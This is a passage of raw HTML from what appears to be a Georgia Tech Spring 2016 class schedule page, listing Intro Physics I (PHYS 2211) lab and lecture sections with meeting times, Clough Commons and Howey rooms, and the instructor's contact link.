</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20992">Intro Physics I - 20992 - PHYS 2211 - K01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20993">Intro Physics I - 20993 - PHYS 2211 - K02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20994">Intro Physics I - 20994 - PHYS 2211 - K03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=27654">Intro Physics I - 27654 - PHYS 2211 - K04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20995">Intro Physics I - 20995 - PHYS 2211 - K05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20996">Intro Physics I - 20996 - PHYS 2211 - K06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20997">Intro Physics I - 20997 - PHYS 2211 - K07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22491">Intro Physics I - 22491 - PHYS 2211 - M</a></th>
</tr>
<tr>
<td class="dddefault">
PHYS2211M
introduces both modern topics (e.g. relativity & quantum
physics) and modern tools such as computer modeling.
Prerequisites are the same as the standard 2211 offering.
This course uses a different textbook than the standard 2211
sections, called Matter & Interactions. No previous
computer programming experience is required.
No lab exemptions are offered.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">10:05 am - 10:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 144</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21022">Intro Physics I - 21022 - PHYS 2211 - M01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22495">Intro Physics I - 22495 - PHYS 2211 - M02</a></th>
</tr>
<tr>
<td class="dddefault">
This lab section is reserved for Honors Program students
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22496">Intro Physics I - 22496 - PHYS 2211 - M03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22497">Intro Physics I - 22497 - PHYS 2211 - M04</a></th>
</tr>
<tr>
<td class="dddefault">
This lab section is reserved for Honors Program students
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 2:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22498">Intro Physics I - 22498 - PHYS 2211 - M05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22499">Intro Physics I - 22499 - PHYS 2211 - M06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 8:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
